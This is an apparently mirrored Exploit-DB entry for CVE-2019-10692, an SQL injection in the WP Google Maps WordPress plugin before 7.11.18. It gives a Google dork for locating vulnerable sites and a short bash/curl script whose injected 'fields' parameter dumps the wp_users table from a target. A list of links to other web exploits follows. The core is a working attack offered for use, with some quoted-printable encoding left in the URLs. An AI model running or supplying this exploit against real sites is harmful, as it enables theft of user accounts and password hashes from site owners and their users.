WordPress Plugin Rest Google Maps < 7.11.18 - SQL Injection

Exploit Database
48 阅读

作者： Jonatas Fil

日期： 2020-10-20
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/48918/

# Exploit Title: WordPress Rest Google Maps Plugin SQL Injection
# Google Dork: inurl:index.php?rest_route=3D/wpgmza/
# Date: 2020-09-09
# Exploit Author: Jonatas Fil
# Vendor Homepage: https://wordpress.org/plugins/wp-google-maps/#developers
# Software Link: https://wordpress.org/plugins/wp-google-maps/
# Version: < 7.11.18
# Tested on: Linux
# CVE : CVE-2019-10692 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=3DCVE-2019-10692)
#!/bin/bash

TARGET="192.168.1.77"

curl -k --silent
"http://$TARGET/index.php?rest_route=3D/wpgmza/v1/markers/&filter=3D%7B%7D&=
fields=3D*+from+wp_users+--+-"
| jq

last Exploits
WordPress Plugin Rest Google Maps < 7.11.18 - SQL Injection的更多信息

OpenEMR 3.2.0 – SQL Injection / Cross-Site Scripting：
Joomla! Component Calendar Planner 1.0.1 – SQL Injection：
phpMyAdmin 2.6.3-pl1 – Cross-Site Scripting / Full Path：
WordPress Plugin Contact Form Maker 1.12.20 – SQL Injection：
EGallery – Arbitrary ‘.PHP’ File Upload (Metasploit)：
ab Web CMS 1.35 – Multiple Vulnerabilities：
xWeblog 2.2 – ‘arsiv.asp?tarih’ SQL Injection：
WSN Guest 1.02 – ‘orderlinks’ SQL Injection：